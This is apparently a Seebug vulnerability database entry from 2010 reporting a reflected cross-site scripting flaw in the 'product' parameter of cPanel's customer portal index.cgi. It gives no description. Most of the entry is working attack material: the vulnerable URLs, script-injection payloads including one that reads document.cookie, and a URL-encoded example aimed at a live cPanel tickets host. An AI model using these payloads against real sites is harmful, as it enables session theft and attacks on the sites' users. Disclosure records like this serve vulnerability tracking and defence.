cPanel Customer Portal (index.cgi) Xss Vulnerability

2010-09-02T00:00:00
ID SSV:20080
Type seebug
Reporter Root
Modified 2010-09-02T00:00:00

Description

No description provided by source.

                                        
                                            
                                                http://localhost.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ]

http://127.0.0.1.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ]

"><script>alert("Inj3ct0r")</script>

"><script>alert(document.cookie)</script>

----------------------------------------------------------------------
-=[ Example ]=-

https://tickets.cpanel.net/submit/index.cgi?step=&reqtype=sales&product=%22%3E%3Cscript%3Ealert(%22inj3ct0r%22)%3C/script%3E

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=